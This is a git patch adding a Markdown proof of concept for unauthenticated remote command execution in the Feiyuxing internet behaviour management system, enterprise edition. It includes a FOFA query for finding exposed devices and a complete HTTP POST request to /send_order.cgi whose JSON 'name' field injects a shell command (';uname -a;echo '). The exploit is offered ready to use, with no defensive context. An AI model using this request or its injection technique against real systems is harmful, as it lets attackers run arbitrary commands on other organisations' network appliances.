From ebff9edd466f6bc4fc4b37aae605662fe6cac895 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 20 Mar 2024 19:18:47 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=A3=9E=E9=B1=BC=E6=98=9F=E4=B8=8A?= =?UTF-8?q?=E7=BD=91=E8=A1=8C=E4=B8=BA=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E4=BC=81=E4=B8=9A=E7=89=88=E5=89=8D=E5=8F=B0RCE.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 飞鱼星上网行为管理系统企业版前台RCE.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 飞鱼星上网行为管理系统企业版前台RCE.md diff --git a/飞鱼星上网行为管理系统企业版前台RCE.md b/飞鱼星上网行为管理系统企业版前台RCE.md new file mode 100644 index 0000000..4efe261 --- /dev/null +++ b/飞鱼星上网行为管理系统企业版前台RCE.md @@ -0,0 +1,26 @@ +## 飞鱼星上网行为管理系统企业版前台RCE + + +## fofa +``` +title="飞鱼星企业" +``` + +## poc +``` +POST /send_order.cgi?parameter=operation HTTP/1.1 +Host: 127.0.0.1 +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 + +{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"} +``` + +![d3caa0beea2be24633c0996d8ae8819c](https://github.com/wy876/POC/assets/139549762/1be7ce47-2ee2-476c-af85-c258c27dc95f)